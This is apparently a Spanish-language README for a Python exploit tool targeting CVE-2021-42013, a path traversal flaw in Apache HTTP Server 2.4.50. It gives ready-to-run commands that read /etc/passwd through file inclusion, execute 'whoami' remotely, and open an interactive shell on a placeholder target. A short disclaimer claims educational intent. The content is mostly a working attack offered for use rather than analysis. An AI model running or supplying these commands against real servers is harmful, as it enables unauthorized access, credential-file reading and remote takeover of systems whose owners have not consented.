
CVE-2021-42013 - Apache 2.4.50
Un script python3 para el CVE-2021-42013 - Apache HTTP Server 2.4.50 LFI y RCE. RCE requiere que cgi-bin esté habilitado.
python3 apache_2.4.50.py -t http://apache.hack/ -lfi /etc/passwd
python3 apache_2.4.50.py -t http://apache.hack/ -rce whoami
python3 apache_2.4.50.py -t http://apache.hack/ -shell
Para ver el menú de ayuda:
python3 apache_2.4.50.py -h
Todo el código proporcionado en este repositorio es solo para fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es de su exclusiva responsabilidad. El mal uso del código en este repositorio puede dar lugar a cargos penales contra las personas en cuestión. El autor no se hará responsable en caso de que se presenten cargos penales contra cualquier persona que haga un mal uso del código en este repositorio para infringir la ley.